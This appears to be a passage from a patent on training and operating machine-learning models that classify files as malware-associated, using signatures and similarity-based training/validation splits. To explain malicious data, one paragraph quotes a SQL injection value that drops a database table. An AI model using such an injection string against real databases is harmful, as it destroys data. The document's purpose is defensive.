In the illustrated example, the signature **118** includes a vector of numerical values, shown as real numbers, although at least some of the numerical values can additionally or alternatively be fractions, integers, imaginary numbers, complex numbers, or other numerical values. The numerical values can be or include feature values, e.g., representing the contents or structure of the data in the data stream **116**. In some examples, the values can be between zero and unity, or at least zero, or at most zero, or unrestricted. The values can be stored in various formats, including two's-complement or sign-magnitude integers or IEEE-754 four-byte ("single") or eight-byte ("double") floating point formats. The term "float value," as used herein, can refer to a value formatted as a single, double, or any other floating-point format. In some examples, signature **118** can include scalar value(s), e.g., numeric, character, string, or boolean value, or compound value(s) such as tuples, structures, or arrays. A compound value can include at least one of a scalar value or another compound value. In some examples, a signature **118** can include a copy of part or all of the respective stream **114** or **116**. In some examples, a signature **118** can include text, e.g., the name of at least one of a family of malware or of a specific virus or other malicious program.

In the illustrated example, the classification **120** includes a bitmask, attribute list, or other representation of categories to which the trial data stream **116** belongs, as determined by CM **112**. For example, classification **120** can include a Boolean value indicating whether or not trial data stream **116** is associated with malware, or an enumerated value indicating with which of several categories trial data stream **116** is associated (e.g., "benign," "virus," or "spyware"). Classification **120** can additionally or alternatively include one or more confidence values or other values indicating the likelihood of a classification, e.g., a "spyware" value of 0.42 indicating a 42% likelihood that the sample is spyware. In an



example, classification **120** can include multiple confidence values for respective categories of malware (e.g., "spyware=0.42; worm=0.05").

Malware programs and other files are often prepared by or using various software tools, referred to herein for brevity as "generators." Generator processing can remove or change characteristics of a file, e.g., by modifying headers or removing markers commonly found in a non-processed file. Example generators can include compilers, linkers, librarians, or other software-development tools useful in preparing computer-executable instructions ("code"); packers, encryptors, or other code-obfuscation tools; or installation, copy-protection, archiving, or self-extractor generation tools useful in packaging the executable code into an executable file or in assembling an executable file from components.

A data stream **114** or **116**, e.g., an executable file **122**, can be associated with malware if, e.g., the data stream is itself malicious code, is (or is likely) at least a portion of a grouping of malicious code, or is output by a generator commonly used for generating malware. For example, a data stream **114** or **116** may include a decruncher that decompresses data from a file into RAM. A decruncher itself may be entirely benign. However, the decompressed data may be or include executable code of a malicious program, dynamic-link library (DLL), or other computer-executable module. Accordingly, a decruncher commonly used to compress malicious code, or compressed malicious code itself, may be associated with malware, as indicated by the classification **120**. Some generators are used for malware, and are also used for legitimate software. A determination that a data stream is associated with malware does not necessarily require or guarantee that the data stream in fact be malware. In some examples, classification **120**, discussed below, can be used by a security analyst in triaging data streams, and can permit the security analyst to readily separate data streams based on a likelihood they are in fact malware

In some examples, malware comprises malicious data instead of or in addition to malicious code. Such data is also considered to be associated with malware. For example, some programs may have bugs that prevent them from correctly processing certain inputs. Examples include Structured Query Language (SQL) injection attacks, in which a program populates a query with unescaped external data. For example, the query template "SELECT cost from Products WHERE name LIKE '%{$name}%';" can be abused by providing malicious data to be populated in place of the placeholder "{$name}". When the malicious data $name="foo'; DROP TABLE Products;—" is substituted into the query template, for example, the resulting query will cause the "Products" table of the database to be deleted ("dropped"), causing unexpected loss of data. In another example, malicious data can include malformed UTF-8 (Unicode Transformation Format—8 bit) that causes a buggy UTF-8 processing routine to enter an unexpected or erroneous state. In still another example, malicious data can include data that is too large or too complicated for a processing routine to handle, e.g., a Christmas-tree packet. Such data can trigger buffer overflows or other vulnerabilities within processing routines. Data designed to trigger or exploit vulnerabilities is associated with malware.

Except as expressly indicated otherwise, a determination of whether a trial data stream **116** is associated with malware is carried out programmatically by or using CM **112** according to techniques herein. Various examples herein can be performed without human judgment of whether a program or data block is in fact malicious. Using CM **112** can permit

more readily identifying potential computational threats, e.g., in the context of an antivirus program or cloud security service.

By way of example and not limitation, computing device(s) **102** and/or **104** can include, but are not limited to, server computers and/or blade servers such as Web servers, map/reduce servers and/or other computation engines, and/or network-attached-storage units (e.g., **102**(**1**)), laptop computers, thin clients, terminals, and/or other mobile computers (e.g., **104**(**1**)), wearable computers such as smart watches and/or biometric and/or medical sensors, implanted computing devices such as biometric and/or medical sensors, computer navigation client computing devices, satellite-based navigation system devices including global positioning system (GPS) devices and/or other satellite-based navigation system devices, personal data assistants (PDAs), and/or other specialized portable electronic devices (e.g., **104**(**2**)), tablet computers, tablet hybrid computers, smartphones, mobile phones, mobile phone-tablet hybrid devices, and/or other telecommunication devices (e.g., **104**(**3**)), portable and/or console-based gaming devices and/or other entertainment devices such as network-enabled televisions, set-top boxes, media players, cameras, and/or personal video recorders (PVRs) (e.g., **104**(**4**), depicted as a gamepad), automotive computers such as vehicle control systems, vehicle security systems, and/or electronic keys for vehicles (e.g., **104**(K), depicted as an automobile), desktop computers, and/or integrated components for inclusion in computing devices, appliances, and/or other computing device(s) configured to participate in and/or carry out computational-model determination and/or operation as described herein, e.g., for file-analysis or malware-detection purposes.

Network(s) **108** can include any type of wired and/or wireless network, including but not limited to local area networks (LANs), wide area networks (WANs), satellite networks, cable networks, Wi-Fi networks, WiMAX networks, mobile communications networks (e.g., 3G, 4G, and so forth) and/or any combination thereof. Network(s) **108** can utilize communications protocols, such as, for example, packet-based and/or datagram-based protocols such as Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol (UDP), other types of protocols, and/or combinations thereof. Moreover, network(s) **108** can also include a number of devices that facilitate network communications and/or form a hardware infrastructure for the networks, such as switches, routers, gateways, access points, firewalls, base stations, repeaters, backbone devices, and the like. Network(s) **108** can also include devices that facilitate communications between computing devices **102** and/or **104** using bus protocols of various topologies, e.g., crossbar switches, INFINIBAND switches, and/or FIBRE CHANNEL switches and/or hubs.

In some examples, network(s) **108** can further include devices that enable connection to a wireless network, such as a wireless access point (WAP). Examples support connectivity through WAPs that send and receive data over various electromagnetic frequencies (e.g., radio frequencies), including WAPs that support Institute of Electrical and Electronics Engineers (IEEE) 802.11 standards (e.g., 802.11g, 802.11n, and so forth), other standards, e.g., BLUETOOTH, cellular-telephony standards such as GSM, LTE, and/or WiMAX.

As noted above, network(s) **108** can include public network(s) or private network(s). Example private networks can include isolated networks not connected with other networks, such as MODBUS, FIELDBUS, and/or Industrial Ethernet networks used internally to factories for machine automation. Private networks can also include networks connected to the Internet and/or other public network(s) via network address translation (NAT) devices, firewalls, network intrusion detection systems, and/or other devices that restrict and/or control the types of network packets permitted to flow between the private network and the public network(s).

Different networks have different characteristics, e.g., bandwidth or latency, and for wireless networks, accessibility (open, announced but secured, and/or not announced), and/or coverage area. The type of network **108** used for any given connection between, e.g., a computing device **104** and cluster **106** can be selected based on these characteristics and on the type of interaction, e.g., ongoing streaming or intermittent request-response communications.

## Illustrative Configurations

FIG. **2** is an illustrative diagram that shows example components of a computing device **200**, which can represent computing device(s) **102** and/or **104**, and which can be and/or implement a computational-model determination and/or operation system, device, and/or apparatus, according to various examples described herein. Computing device **200** can include and/or be included in a system and/or device for determining and/or operating a computational model as described herein.

Computing device **200** can include and/or be connected to a user interface **202**. In some examples, user interface **202** can be configured to permit a user, e.g., entity **110** and/or a computational-model (CM) administrator, to operate the CM **112**, or to control and/or otherwise interact with cluster **106** and/or computing devices **102** therein. Accordingly, actions such as presenting information of or corresponding to an output of a CM **112** to entity **110** can be taken via user interface **202**.

In some examples, user interface **202** can include various types of output devices configured for communication to a user and/or to another computing device **200**. Output devices can be integral and/or peripheral to computing device **200**. Examples of output devices can include a display **204**, a printer, audio speakers, beepers, and/or other audio output devices, a vibration motor, linear vibrator, and/or other haptic output device, and the like. Display **204** can include an organic light-emitting-diode (OLED) display, a liquid-crystal display (LCD), a cathode-ray tube (CRT), and/or another type of visual display. Display **204** can be a component of a touchscreen, and/or can include a touchscreen.

User interface **202** can include a user-operable input device **206** (depicted as a gamepad). User-operable input device **206** can include one or more input devices, integral and/or peripheral to computing device **200**. The input devices can be user-operable, and/or can be configured for input from other computing device **200**. Examples of input devices can include, e.g., a keyboard, keypad, a mouse, a trackball, a pen sensor and/or smart pen, a light pen and/or light gun, a game controller such as a joystick and/or game pad, a voice input device such as a microphone, voice-recognition device, and/or speech-recognition device, a touch input device such as a touchscreen, a gestural and/or motion input device such as a depth camera, a grip sensor, an accelerometer, another haptic input, a visual input device such as one or more cameras and/or image sensors, and the like. User queries can be received, e.g., from entity **110**, via user interface **202**.

Computing device **200** can further include one or more input/output (I/O) interface(s) **208** to allow computing device **200** to communicate with input, output, and/or I/O devices (for clarity, some not depicted). Examples of such devices can include components of user interface **202** such as user-operable input devices and output devices described above. Other examples of such devices can include power meters, accelerometers, and other devices for measuring properties of entity **110**, computing device **200**, and/or another computing device **102** and/or **104**. Computing device **200** can communicate via I/O interface **208** with suitable devices and/or using suitable electronic/software interaction methods. Input data, e.g., of user inputs on user-operable input device **206**, can be received via I/O interface **208** (e.g., one or more I/O interface(s)). Output data, e.g., of user interface screens, can be provided via I/O interface **208** to display **204**, e.g., for viewing by a user.

The computing device **200** can include one or more processing unit(s) **210**. In some examples, processing unit(s) **210** can include and/or be connected to a memory **212**, e.g., a RAM and/or cache. Processing units **210** can be operably coupled to the I/O interface **208** and to at least one computer-readable media **214** (CRM), e.g., a tangible non-transitory computer-readable medium.

Processing unit(s) **210** can be and/or include one or more single-core processors, multi-core processors, CPUs, GPUs, GPGPUs, and/or hardware logic components configured, e.g., via specialized programming from modules and/or APIs, to perform functions described herein. For example, and without limitation, illustrative types of hardware logic components that can be used in and/or as processing units **210** include Field-programmable Gate Arrays (FPGAs), Application-specific Integrated Circuits (ASICs), Application-specific Standard Products (ASSPs), System-on-a-chip systems (SOCs), Complex Programmable Logic Devices (CPLDs), Digital Signal Processors (DSPs), and other types of customizable processors. For example, processing unit(s) **210** can represent a hybrid device, such as a device from ALTERA and/or XILINX that includes a CPU core embedded in an FPGA fabric. These and/or other hardware logic components can operate independently and/or, in some instances, can be driven by a CPU. In some examples, at least some of computing device(s) **102** and/or **104**, FIG. **1**, can include a plurality of processing units **210** of multiple types. For example, the processing units **210** in computing device **102**(N) can be a combination of one or more GPGPUs and one or more FPGAs. Different processing units **210** can have different execution models, e.g., as is the case for graphics processing units (GPUs) and central processing unit (CPUs). In some examples at least one processing unit **210**, e.g., a CPU, graphics processing unit (GPU), and/or hardware logic device, can be incorporated in computing device **200**, while in some examples at least one processing unit **210**, e.g., one or more of a CPU, GPU, and/or hardware logic device, can be external to computing device **200**.

Computer-readable media described herein, e.g., CRM **214**, includes computer storage media and/or communication media. Computer storage media includes tangible storage units such as volatile memory, nonvolatile memory, and/or other persistent and/or auxiliary computer storage media, removable and non-removable computer storage media implemented in any method and/or technology for storage of information such as computer-readable instructions, data structures, program modules, and/or other data. Computer storage media includes tangible and/or physical forms of media included in a device and/or hardware component that is part of a device and/or external to a device, including but not limited to RAM, static RAM (SRAM), dynamic RAM (DRAM), phase change memory (PRAM), read-only memory (ROM), erasable programmable read-only memory (EPROM), electrically erasable programmable read-only memory (EEPROM), flash memory, compact disc read-only memory (CD-ROM), digital versatile disks (DVDs), optical cards and/or other optical storage media, magnetic cassettes, magnetic tape, magnetic disk storage, magnetic cards and/or other magnetic storage devices and/or media, solid-state memory devices, storage arrays, network attached storage, storage area networks, hosted computer storage and/or memories, storage, devices, and/or storage media that can be used to store and maintain information for access by a computing device **200**.

In contrast to computer storage media, communication media can embody computer-readable instructions, data structures, program modules, and/or other data in a modulated data signal, such as a carrier wave, and/or other transmission mechanism. As defined herein, computer storage media does not include communication media.

In some examples, CRM **214** can store instructions executable by the processing unit(s) **210**, and/or instructions executable by external processing units such as by an external central processing unit (CPU) and/or external processor of any type discussed herein. Any of these instructions are referred to herein as computer-executable instructions or processor-executable instructions. For example, CRM **214** can store instructions of an operating system **216**. CRM **214** can additionally or alternatively store at least one executable file **218**, which can represent executable file **122**, FIG. **1**. Executable file **218** represents any file comprising computer-executable instructions, even if those instructions are compressed, encrypted, or otherwise obfuscated. In some examples, executable file **218** comprises at least one header or other information usable by a loader (e.g., a loading routine such as UNIX/POSIX exec(2)) in loading the computer-executable instructions from executable file **218** into a RAM or other high-speed memory, or in otherwise preparing computer-executable instructions from executable file **218** for execution by processing unit(s) **210**. In the illustrated example, the loader is a component of the operating system **216**, although some examples, e.g., bare-metal embedded-systems configurations, can include a loader but not an operating system **216**. Examples herein are discussed with reference to executable file **218** and can additionally or alternatively be used for other types of files, e.g., data files.

Table 1 shows an example of a portion of executable file **218**. Table 1 shows an example of a conventional MICROSOFT WINDOWS Portable Executable (PE) file, but this example is not limiting. Executable file **218** can be, for example, an a. out, Common Object File Format (COFF), MZ (MS-DOS), NE (WINDOWS 3.1), PE, Mach-O, or Executable and Linkable Format (ELF) compiled object file (e.g., a standalone executable or a static or dynamic library), an ar static-library archive, a Java Archive (JAR), or a Dalvik Executable (DEX) archive.

TABLE 1

| Offset | Field |
|---|---|
| 0x00 | Pattern: 0x4D 0x5A |
| . . . | |
| 0x3C | Offset of PE header, referred to in this table as "OFS". |
| . . . | |
| OFS + 0x00 | Pattern: 0x50 0x45 |

TABLE 1-continued

| Offset | Field |
|---|---|
| . . . | |
| OFS + 0x28 | Offset of entry point, in this table "ENTRY" |
| . . . | |
| ENTRY + 0x00 | The code to be executed after the executable file is loaded, typically library-provided startup code |
| . . . | |
| ENTRY + n | A jump from the startup code to the beginning of code specific to the particular executable file |
| . . . | |
| MAIN | The code specific to the particular executable file, e.g., compiled from the C main( ) function. |

In some examples, trial data stream **116** can include a predetermined number of bytes beginning at address ENTRY or at address MAIN in Table 1. In some examples, trial data stream **116** can include a predetermined number of bytes beginning at the beginning of a particular section of an executable file, e.g., a TEXT or DATA segment. In some examples, trial data stream **116** can include a predetermined number of bytes beginning at a header with the trial data stream **116**, e.g., an MP3 header or an ID3v2 or VORBIS comment block.

Computer-executable instructions or other data stored on CRM **214** can additionally or alternatively include at least one computational model (CM) **220**, which can represent CM **112**, FIG. **1**, or instructions of the operating system **216**, a representation module **222**, a preparation module **224**, a training module **226**, an operation module **228**, a communications module **230**, and/or other modules, programs, and/or applications that are loadable and executable by processing unit(s) **210**. Processing unit(s) **210** can be configured to execute modules of the plurality of modules. For example, the computer-executable instructions stored on the computer-readable media **214** can upon execution configure a computer such as a computing device **200** to perform operations described herein with reference to the modules of the plurality of modules. The modules stored in the computer-readable media **214** can include instructions that, when executed by the one or more processing units **210**, cause the one or more processing units **210** to perform operations described below. For example, the computer-executable instructions stored on the computer-readable media **214** can upon execution configure a computer such as a computing device **102** and/or **104** to perform operations described herein with reference to the operating system **216** or the above-listed modules **222-230**.

In some examples not shown, one or more of the processing unit(s) **210** in one of the computing device(s) **102** and/or **104** can be operably connected to computer-readable media **214** in a different one of the computing device(s) **102** and/or **104**, e.g., via communications interface **232** (discussed below) and network **108**. For example, program code to perform steps of flow diagrams herein, e.g., as described herein with reference to modules **222-230**, can be downloaded from a server, e.g., computing device **102(1)**, to a client, e.g., computing device **104**(K), e.g., via the network **108**, and executed by one or more processing unit(s) **210** in computing device **104**(K).

The computing device **200** can also include a communications interface **232**, which can include a transceiver device such as a network interface controller (NIC) to send and receive communications over a network **108** (shown in phantom), e.g., as discussed above. As such, the computing device **200** can have network capabilities. Communications interface can include any number of network, bus, and/or memory interfaces, in any combination, whether packaged together and/or separately. In some examples, communications interface **232** can include a memory bus internal to a particular computing device **102** or **104**, transmitting via communications interface **232** can include storing the transmitted data in memory **212** or computer-readable media **214**, and receiving via communications interface **232** can include retrieving data from memory **212** or computer-readable media **214**. In some examples, the communications interface **232** can include, but is not limited to, a transceiver for cellular (3G, 4G, and/or other), WI-FI, Ultra-wideband (UWB), BLUETOOTH, and/or satellite transmissions. The communications interface **232** can include a wired I/O interface, such as an Ethernet interface, a serial interface, a Universal Serial Bus (USB) interface, an INFINIBAND interface, and/or other wired interfaces. The communications interface **232** can additionally and/or alternatively include at least one user-interface device or user interface, at least one bus such as a memory bus and/or local bus, at least one memory interface, and/or at least one hardwired interface such as a 0-20 mA control line.

In some examples, the operating system **216** can include components that enable and/or direct the computing device **200** to receive data via various inputs (e.g., user controls such as user-operable input device **206**, network and/or communications interfaces such as communications interface **232**, devices implementing memory **212**, and/or sensors), and process the data using the processing unit(s) **210** to generate output. The operating system **216** can further include one or more components that present the output (e.g., display an image on an electronic display **204**, store data in memory **212**, and/or transmit data to another computing device **102** or **104**. The operating system **216** can enable a user (e.g., entity **110**) to interact with the computing device **200** using a user interface **202**. Additionally, the operating system **216** can include components that perform various functions generally associated with an operating system, e.g., storage management and internal-device management.

In some examples, the processing unit(s) **210** can access the module(s) on the computer-readable media **214** via a bus **234**. I/O interface **208** and communications interface **232** can also communicate with processing unit(s) **210** via bus **234**. Bus **234** can include, e.g., at least one of a system bus, a data bus, an address bus, a Peripheral Component Interconnect (PCI) Express (PCIe) bus, a PCI bus, a Mini-PCI bus, any variety of local, peripheral, and/or independent buses, and/or any combination thereof.

In various examples, the number of modules can vary higher and/or lower, and modules of various types can be used in various combinations. For example, functionality described associated with the illustrated modules can be combined to be performed by a fewer number of modules and/or APIs and/or can be split and performed by a larger number of modules and/or APIs. For example, the representation module **222** and the preparation module **224** can be combined in a single module that performs at least some of the example functions described below of those modules, or, likewise, the training module **226** and the operation module **228**, or all four modules **222-228**. In some examples, computer-readable media **214** can include a subset of the above-described modules.

In the illustrated example, the representation module **222** determines a signature **118** of the executable file **218**. For example, the signature can include a locality-sensitive hash (LSH) value of a feature vector associated with the execut-

able file **218**. Examples are discussed herein, e.g., with reference to at least one of FIG. **3-7**, **9**, **11**, or **12**.

In the illustrated example, the preparation module **224** determines a training set and a validation set of the training data streams **114** based at least in part on the signature **118**. For example, the preparation module **224** can divide a collection of training data streams **114** into the training set and the validation set. Examples are discussed herein, e.g., with reference to at least one of FIG. **3**, **4**, **6**, **10**, or **11**.

In the illustrated example, the training module **226** determines the CM **220**, e.g., based at least in part on the training set. For example, the training module **226** can update parameters of a neural network based at least in part on the training data streams **114** of the training set. Examples are discussed herein, e.g., with reference to at least one of FIG. **3**, **4**, **6**, **8-10**, or **12**.

In the illustrated example, the operation module **228** operates the CM **220** based at least in part on a trial data stream **116** to provide atrial model output. The trial model output can include a classification **120**. Examples are discussed herein, e.g., with reference to at least one of FIG. **3-5**, **8-10**, or **12**. Operation module **228** can provide an output **236**, e.g., a signature **118** or classification **120**. Output **236** is shown as stored in computer-readable media **214**. Output **236** can additionally or alternatively be stored in memory **212** or another processor-accessible storage device, e.g., a transmit buffer of communications interface **232**. In some examples, the classification **120** can indicate whether the trial data stream **116** is associated with malware. In some examples, CM **220** can be configured to provide a classification **120** for any type of trial data stream **116**. In other examples, CM **220** can be configured to provide a classification **120** for trial data stream **116** known to be of a particular type, e.g., of a particular family of malware. For example, separate CMs **220** can be determined and operated for ransomware and spyware.

In some examples, the operation module **228** can determine respective outputs **236** for multiple trial data streams **116**. The operation module **228** can then locate data streams **116** similar to a given data stream **116** based at least in part on similarity of the outputs **236**, e.g., based on Euclidean or another distance metric between the respective outputs **236** for multiple different data streams **116** (e.g., files).

In some examples, the training module **226** or the operation module **228** can operate the CM **220** based at least in part on training data stream(s) **114** of the validation set to evaluate the performance of the CM **220**. The CM **220** can then be updated based on the evaluation. The arrow from operation module **228** to training module **226** depicts coordination between those modules; alternatively, the evaluation and updating can both be performed by the training module **226**.

In the illustrated example, the communications module **230** can transmit an indication of the output **236**, e.g., via the communications interface **232**. For example, the indication can be transmitted to a computing device **104**. Examples are discussed herein, e.g., with reference to FIG. **1**. In some examples, communications module **230** can additionally or alternatively receive the executable file **218** (or another data stream) via the communications interface **232**.

In some examples, the operation module **228**, the communications module **230**, or another module stored in computer-readable media **214** can be configured to receive inputs, e.g., via user-operable input device **206** or from a filesystem, transmit corresponding queries to a computing device **102**, receive responses from computing device **102**, and present the responses, e.g., via display **204**. In some examples, determination and operation of CMs are carried out on computing device(s) **102**. In some examples, determination and operation are carried out on a computing device **104**. In some of these examples, any of the above-noted modules can be configured to receive inputs, determine and/or operate CM(s) **112** using instructions of operation module **228** based at least in part on those inputs, e.g., to determine a model output. In some examples, computer-executable instructions on computer-readable media **214** can include, but are not limited to, instructions of a Web browser, smartphone app or desktop application, background service conducting or monitoring network communications, or instant-messaging client, or can include components of any of those configured to perform functions described herein. Such programs or components can invoke or include functions of any of the listed modules.

## Illustrative Processes

FIG. **3** is a dataflow diagram that illustrates an example process **300** for determining and operating computational model(s), and related dataflow. Example functions shown in FIG. **3** and other flow diagrams and example processes herein can be implemented on and/or otherwise embodied in one or more computing device(s) **102** and/or **104**, e.g., a computing device **200**, e.g., using software running on such device(s), e.g., software executed by processing unit(s) **210**. For the sake of illustration, the example process **300** is described below with reference to processing unit **210** and other components shown in FIGS. **1** and **2** that can carry out and/or participate in the steps of the exemplary method. However, other processing unit(s) such as processing unit(s) **210** and/or other components of computing device(s) **102** and/or **104** can carry out step(s) of described example processes such as process **300**. Similarly, exemplary method(s) shown in FIGS. **4-12** are also not limited to being carried out by any specifically-identified components.

The order in which the operations are described in each example flow diagram and/or process is not intended to be construed as a limitation, and any number of the described operations can be combined in any order and/or in parallel to implement each process. In each flow diagram, fewer than all of the depicted operations can be performed, except as expressly noted. Moreover, the operations in each of FIGS. **3-12** can be implemented in hardware, software, and/or a combination thereof. In the context of software, the operations represent computer-executable instructions that, when executed by one or more processors, cause the one or more processors to perform the recited operations. In the context of hardware, the operations represent logic functions implemented in circuitry, e.g., datapath-control and finite-state-machine sequencing functions. Therefore, descriptions of operations below also describe such software or hardware structures to carry out the described functions. Operations herein can be performed by modules described herein with reference to FIG. **2**.

For clarity of explanation, the operations of FIG. **3** are described in terms of a batch process. However, this is not limiting, and the operations of FIG. **3** (or FIGS. **4-12**) can be performed in a streamed or pipelined manner, or any combination of batch, stream, and pipelined processing.

In some examples, at operation **302**, the representation module **222** determines respective signatures **304** of individual training data streams **114** of a plurality of training data streams **114**. As discussed above, the training data streams **114** can be, include, or consist of files or other streams of data. Each training data stream **114** can include

the entirety of a data unit such as a file, or only a portion thereof. In some examples, the signature **118** for a training data stream **114** can include a feature vector or hash value of the training data stream **114**, or other values described above with reference to FIG. **1**. In some examples, the representation module **222** can determine the signatures as LSH values of or otherwise associated with the respective training data streams **114**. Examples of feature vectors and LSH are discussed herein with reference to operation **402**, FIG. **4**, and to FIGS. **5** and **11**.

In some examples, the representation module **222** can determine at least one of the signatures **304** including or consisting of a hash of at least a portion of the respective training data stream **114**. For example, the representation module **222** can compute a cryptographic hash value, e.g., a Secure Hash Algorithm 2-256 bit (SHA-256), SHA-3, Skein, or other cryptographic hash value, of at least part of the respective training data stream **114**. In some examples, the representation module **222** can determine at least one of the signatures **304** including or consisting of a value determined using context-triggered piecewise hashing, e.g., the ssdeep hash, or another content-dependent hash technique.

In some examples, at least one of the plurality of training data streams **114** comprises at least part of an executable file **218**. For example, each training data streams **114** can include at least part of a respective executable file **218**. In some examples, no two training data streams **114** are associated with the same executable file **218**. In some examples, at least two of the training data streams **114** are associated with the same executable file **218**. For example, a fat binary including code for multiple processor architectures can be associated with multiple training data streams **114**, one for each architecture.

In some examples, at operation **306**, the preparation module **224** determines a training set **308** comprising at least some training streams **310** of the plurality of training data streams **114** and a validation set **312** comprising at least some validation streams **314** of the plurality of training data streams **114**. In some examples, at least one of the training set **308** and the validation set **312** additionally includes at least some labels indicating target model outputs associated with the respective training streams **310** or validation streams **314**. In some examples of training a computational model **220** to determine a classification **120** of a data stream, the respective labels can include respective classifications **120** of the respective training streams **310** or validation streams **314**. For example, some of the training streams **310** or validation streams **314** can be associated with malware (for brevity, "dirty"), some of the training streams **310** or validation streams **314** can be not associated with malware ("clean"), and labels for the training streams **310** or validation streams **314** can indicate whether or not respective streams are associated with malware. In some examples, the preparation module **224** can select the training set **308** and the validation set **312** so that each of the training set **308** and the validation set **312** includes at least one clean stream and at least one dirty stream.

The preparation module **224** can select the training set **308** and the validation set **312** based at least in part on the signatures **118** and a predetermined difference criterion **316**. In some examples, the preparation module **224** can select the validation set **312** so that each validation data stream **314** is dissimilar to, i.e., satisfies the predetermined difference criterion **316** with respect to, each training stream **310**. This can reduce the risk of overfitting of computational model (CM) **220**, since a computational model **220** tested on the validation streams **314** will not have been trained on similar training streams **310**. In some examples, the predetermined difference criterion **316** is defined with respect to the signatures **304**, as discussed in more detail below. For example, the predetermined difference criterion **316** can define a threshold for difference between training data streams **114** or signatures **304** thereof above which two training data streams **114** will be considered distinct.

In some examples, the training set **308** and the validation set **312** can be disjoint (i.e., no individual training data stream **114** is in both the training set **308** and the validation set **312**), but this is not required. In some examples, fewer than 5% (or 10%, 15%, 25%, or 50%) of the training data streams **114** in the training set **308** are also in the validation set **312**, or vice versa, or both.

In some examples, the preparation module **224** can cluster the training data streams **114** into two clusters, one cluster for the training streams **310** and the other cluster for the validation streams **314**. Clustering can be performed using hierarchical clustering, k-means (e.g., 2-means) clustering, k-medoids (e.g., 2-medoids) clustering, or other clustering algorithms or techniques. In some examples, the preparation module **224** can select without replacement from the training data streams **114** and allocate each selected training data stream **114** to either the training set **308** or the validation set **312** based on differences between the signature **304** of the selected training data stream **114** and the signature(s) of the already-allocated training stream(s) **310** or validation stream(s) **314**.

In some examples, the preparation module **224** computes a locality sensitive hash (LSH) or other signature **304** for each training data stream and allocates each stream to exactly one of the training set **304** or the validation set **312** so that there is no particular LSH value or other signature **304** common to streams in both sets **304**, **312**. In some examples, the preparation module **224** separates training streams **310** from validation streams **314** based on detection names derived using conventional anti-virus signatures. In some examples, related malware samples, e.g., as indicated by a common prefix in the detection name (e.g., "Burger" or "Silly"), can be placed entirely in the training set **304** or entirely in the validation set **312**, rather than being split between the two sets **304**, **312**. In some examples, malware samples are named according to Computer Antivirus Research Organization (CARO) conventions, and sets of samples that share a CARO family name, or a family name plus variant name, are placed in their entirety in either training set **304** or validation set **312**. In some examples, sets of samples sharing a product name, e.g., in the Portable Executable VERSIONINFO or other metadata, are placed in their entirety in either training set **304** or validation set **312**.

In some examples, related malware samples can be placed primarily in the training set **304** or primarily in the validation set **312**. For example, out of a group of related samples, the number of the samples in one of the training set **304** and the validation set **312** can be at most 25% of the number of the samples in the other of the training set **304** and the validation set **312** (or other percentages, e.g., 10%, 5%, or 1%). In any examples in this paragraph or the preceding discussion, beginning with operation **306**, a set of samples considered to be similar can be apportioned so that at most a selected percentage of the samples is in one of the training set **304** and the validation set **312** and the remainder of the samples are in the other of the training set **304** and the validation set **312**. Selected percentages can include, e.g., 1%, 5%, 10%, or 25%. Further examples of operation **306** are discussed herein with reference to at least one of FIG. **4**, **6**, **10**, or **11**, or to predetermined difference criterion **316**.

In some examples, at operation **318**, the training module **226** determines a CM **220** based at least in part on the training set **308**. The CM **220** can be configured to take a signature **118** as input and provide a classification **120** as output. In some examples, the CM **220** can include a neural network, decision tree, decision forest, support vector classification, support vector regression, logistic regression, Gaussian process regression or other type of model described herein with reference to CM **112**. For example, the training module **226** can perform stochastic gradient descent to train a neural network or decision tree, or can perform another computational-model determining process or algorithm discussed herein. In some examples, the training module **226** can perform minibatch-based training. In some examples, depicted using a dashed line, the training module **226** can run at least one training epoch, then validate using the validation set **312**. Examples are discussed herein, e.g., with reference to operations **408-414**, FIG. **4**, or FIG. **8** or **10**.

In some examples, at operation **318**, the training module **226** (or the operation module **228**, and likewise throughout this paragraph) can determine a plurality of partitions of the training set based at least in part on the signatures. Each partition of the plurality of partitions can include or consist of at least one of the data streams of the training set. The training module **226** can provide individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface **232** communicatively connected with the processing unit(s) **210**. The training module **226** can receive respective results from individual computing nodes of the plurality of computing nodes. The training module **226** can then determine the CM based at least in part on the results. Examples are discussed herein, e.g., with reference to process **900**, FIG. **9**.

Throughout this disclosure, the term "node" refers to a device or portion of a device configured to perform functions described herein, e.g., neural-network training or other computational-model determination. In at least one example, training module **226** executes on each of a plurality of computing devices **200**, and each computing device **200** has exactly one single-core processing unit **210**. Each such computing device **200** is a node in this example. In some examples, training engine **202** executes on a single computing device **200** having a plurality of multi-core processing units **210**. In such examples, each core of the multi-core processing units **210** represents a node. Other combinations, and points between these extremes, can also be used. For example, an individual processing unit **210**, e.g., an accelerator such as an FPGA, can include or implement one or more nodes. In other examples, multiple cores of a processing unit **210** can be configured to operate together as a single node.

In some examples, at operation **320**, the operation module **228** operates the CM **220** based at least in part on a trial data stream **116** to provide a trial model output **322**. For example, the operation module **228** can determine a feature vector of the trial data stream **116** and apply the feature vector to the trained CM **220** to determine a classification **120** as the trial model output **322**. In some examples, the trial model output **322** indicates whether the trial data stream **116** (e.g., executable instructions or data) is associated with malware. In an example in which the CM **220** includes a neural network, the operation module **228** can apply multiplication, summing, and activation functions to successive layers of the neural network, beginning with the feature vector applied as the input to a first layer of the neural network. In an example in which the CM **220** includes a decision tree, the operation module **228** can perform successive tests for specific characteristics of the feature vector while traversing the decision tree. Feature vectors can be determined, e.g., as described herein with reference to operation **502**, feature vectors **504**, operation **714**, feature vectors **716**, operation **1106**, or feature vector **1108**



FIG. **4** is a dataflow diagram that illustrates an example process **400** for determining and operating CM(s), and related dataflow. In some examples, operation **302** can include operation **402**. In some examples, operation **306** can include operation **406**. In some examples, e.g., examples in which the CM **220** comprises a neural network (NN), decision tree, decision forest, or tree ensemble, operation **318** can include operations **408**, **410**, or **414**. Each of the following groups of operations can be used in combination with other(s) of the groups or independently: (1) **402**, (2) **406**, or (3) **408**, **410**, and **414**.

In some examples, at operation **402**, the representation module **222** determines at least some of, or all of, a plurality of LSH signatures **404** as LSH values associated with the respective training data streams **114**. LSH signatures **404** can represent signatures **304**. For example, the LSH signatures **404** can include or consist of LSH values computed based on bit(s) of the training data streams **114** or on feature vectors that are themselves determined based on bit(s) of the training data streams **114**. Further examples of feature vectors are discussed below with reference to FIG. **5**.

